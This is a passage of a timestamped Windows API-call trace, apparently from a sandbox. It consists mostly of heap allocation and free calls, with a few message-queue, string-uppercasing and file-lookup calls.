HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0159.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0159.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0159.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0159.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0159.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0159.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0159.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0159.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0159.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0159.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.289] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0159.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0159.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0159.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0159.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0159.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0159.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0159.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0159.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0159.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0159.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.293] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0159.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0159.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0159.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0wIFgl.pps", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd99e5710, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x18807430, ftLastAccessTime.dwHighDateTime=0x1d4c711, ftLastWriteTime.dwLowDateTime=0x18807430, ftLastWriteTime.dwHighDateTime=0x1d4c711, nFileSizeHigh=0x0, nFileSizeLow=0xd6d0, dwReserved0=0xf7d0006, dwReserved1=0xccb8, cFileName="0wIFgl.pps", cAlternateFileName="")) returned 0xaa5660 [0159.295] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.295] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0159.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0159.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.298] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.299] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 